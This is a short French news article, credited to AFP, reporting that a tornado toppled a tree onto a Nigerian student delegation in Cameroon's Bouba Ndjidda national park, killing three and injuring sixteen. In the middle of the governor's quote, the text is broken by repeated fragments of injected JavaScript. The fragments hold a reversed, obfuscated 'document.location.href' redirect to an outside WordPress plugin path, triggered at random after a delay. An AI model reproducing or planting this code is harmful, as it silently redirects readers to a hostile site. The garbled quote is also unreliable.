AFRIQUEEDUCATION

Cameroun: Trois étudiants nigérians tués dans un parc national

Trois étudiants nigérians ont été tués et seize personnes blessées pendant un “voyage d’études” dans un parc animalier du nord du Cameroun, a annoncé mardi le gouverneur de région à la radio d’Etat camerounaise (CRTV).

“A la suite d’une toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tornade, un arbre est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombé sur une délégation” d’étudiants nigérians qui séjournait dans le parc national de Bouba Ndjidda (nord), a déclaré Jean Abate Edi’i, gouverneur de région. Le bilan de cet accident est de “trois morts et seize blessés”.

La délégation nigériane, qui était composée de 50 étudiants et de six membres du personnel d’encadrement, se trouvait dans le parc de Bouba Ndjidda pour “un voyage d’étude”, selon la CRTV.

Ce parc est connu pour sa population d’éléphants.

Selon la radio, les blessés ont été pris en charge “gratuitement” à Garoua, chef-lieu de la région du Nord.

Le 8 février, six militaires en mission de sécurisation de ce parc, et deux civils, avaient été abattus par des braconniers.

Avec AFP

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :